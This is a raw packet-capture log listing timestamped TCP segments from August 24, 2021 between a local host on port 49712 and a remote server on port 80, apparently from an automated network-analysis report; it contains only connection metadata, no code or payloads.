Aug 24, 2021 08:49:17.449722052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449738026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449750900 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449754000 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449769020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449780941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449784040 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449800014 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449807882 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449820042 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449832916 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449837923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449853897 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449870110 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449877024 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449892998 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449897051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449913025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449915886 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.449928999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449945927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449959993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449980021 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.449999094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450006962 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450015068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450031996 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450042963 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450047970 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450062990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450078964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450079918 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450094938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450105906 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450122118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450139046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450140953 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450155020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450161934 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450170994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450186968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450202942 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450206041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450222969 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450237989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450246096 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450253963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450267076 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450269938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450285912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450305939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450305939 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450323105 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450339079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450352907 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450355053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450371027 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450385094 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450387001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450403929 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450417042 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450418949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450438023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450447083 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450454950 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450470924 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450479031 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450488091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450505018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450510979 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450519085 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450535059 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450541019 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450551033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450568914 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450570107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450587034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450602055 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450615883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450618029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450634003 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450649023 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450660944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450664997 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450680971 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450696945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450700045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450716972 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450727940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450731993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450747967 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450756073 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450763941 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450779915 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450795889 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450809002 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450809956 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450829029 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450845957 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450850964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450862885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450879097 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450900078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450911045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450912952 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450928926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450946093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450958014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.450965881 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450984001 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.450987101 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451001883 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451018095 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451033115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451042891 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451049089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451066017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451081991 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451082945 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451102018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451122999 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451142073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451143026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451159954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451174974 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451191902 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451191902 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451208115 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451224089 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451240063 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451242924 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451256037 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451276064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451292992 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451297045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451308966 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451324940 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451325893 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451343060 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451354027 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451358080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451375008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451384068 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451390982 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451411009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451416969 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451427937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451443911 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451461077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451473951 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451478958 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451494932 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451508045 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451515913 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451525927 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451543093 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451550007 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451559067 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451575041 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451591015 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451603889 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451606989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451627016 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451643944 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451644897 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451659918 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451675892 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451692104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451704025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451708078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451724052 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451740026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451755047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451759100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451777935 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451786995 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.451792955 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.451821089 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.456872940 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.456907034 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.456923008 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.456943989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.456962109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.456978083 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.456995010 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457009077 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.457010984 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457027912 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457045078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457062006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457077980 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.457082033 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457098961 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457113981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457118988 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.457130909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.457150936 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.457175016 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.473943949 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.473978043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.473990917 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474011898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474030018 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474046946 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474062920 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474078894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474095106 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474111080 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474131107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474148989 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474164963 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474176884 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474180937 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474198103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474209070 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474212885 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474230051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474244118 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474245071 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474265099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474273920 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474282026 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474298954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474304914 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474314928 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474332094 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474333048 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474348068 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474360943 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474371910 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474374056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474399090 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474414110 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474415064 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474435091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474445105 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474452019 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474467993 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474478006 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474486113 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474502087 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474517107 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474519014 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474533081 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474550009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474559069 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474567890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474586964 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474586964 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474602938 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474620104 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474620104 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474636078 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474646091 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474653006 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474669933 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474672079 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474684954 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474704981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474713087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474723101 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474740028 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474756002 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474765062 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474771976 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474782944 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474788904 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474805117 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474813938 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474821091 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474841118 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474853039 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474858046 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474874020 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474879026 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474889994 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474903107 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474905968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474922895 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474939108 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474951982 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.474955082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474975109 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.474992990 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475008965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475008965 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475024939 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475033045 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475040913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475056887 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475068092 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475073099 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475089073 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475105047 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475109100 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475143909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475153923 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475166082 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475182056 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475193977 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475202084 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475219965 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475229025 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475234985 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475251913 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475269079 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475275040 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475285053 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475301981 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475310087 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475318909 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475336075 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475339890 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475358009 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475374937 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475375891 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475392103 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475404978 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475408077 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475424051 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475440025 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475455999 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475471973 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475483894 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475502968 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475512981 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475518942 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475539923 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475558043 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475574017 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475577116 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:17.475591898 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:17.475609064 CEST	80	49712	212.224.105.79	192.168.2.5
